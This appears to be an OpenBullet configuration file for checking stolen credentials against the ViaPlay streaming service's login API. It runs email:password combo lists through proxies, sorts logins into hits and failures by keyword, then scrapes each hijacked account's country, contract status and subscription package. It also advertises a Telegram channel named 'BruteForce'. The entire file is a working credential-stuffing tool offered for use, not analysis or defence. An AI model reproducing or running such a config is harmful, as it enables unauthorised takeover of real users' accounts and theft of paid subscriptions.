[SETTINGS]
{
  "Name": "ViaPlay",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-14T00:37:04.8696537+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | Capture | Move Free To Custom | CPM Rate: 100-500",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://login.viaplay.se/api/login/v1?deviceKey=pcdash-se&returnurl=https://content.viaplay.se/pcdash-se&username=<USER>&persistent=true" 
  CONTENT "password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.viaplay.se" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json" 
  HEADER "Origin: https://viaplay.se" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.170" 
  HEADER "DNT: 1" 
  HEADER "Referer: https://viaplay.se/" 
  HEADER "Accept-Language: en-US;q=0.8,en;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "AuthenticationError" 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Retry OR 
    KEY "MissingRequiredParameterError" 

#Country PARSE "<SOURCE>" LR "accountCountry\":\"" "\"" -> CAP "Country" 

#has_Contracts PARSE "<SOURCE>" LR "hasContracts\":" ",\"" -> CAP "Has Contracts" 

REQUEST GET "https://account.viaplay.se/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Kir PARSE "<SOURCE>" LR "<h2 class=\"overview-widget__title\">Paket</h2>" "</a>" -> VAR "Kir" 

#Sub PARSE "<Kir>" LR "<div class=\"overview-widget__column overview-widget__content\">" "" CreateEmpty=FALSE -> CAP "Sub" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Sub>" Contains "Välj ett paket" 

#CC FUNCTION Constant "T.me/BruteForce " -> CAP " Telegram Channel: " 

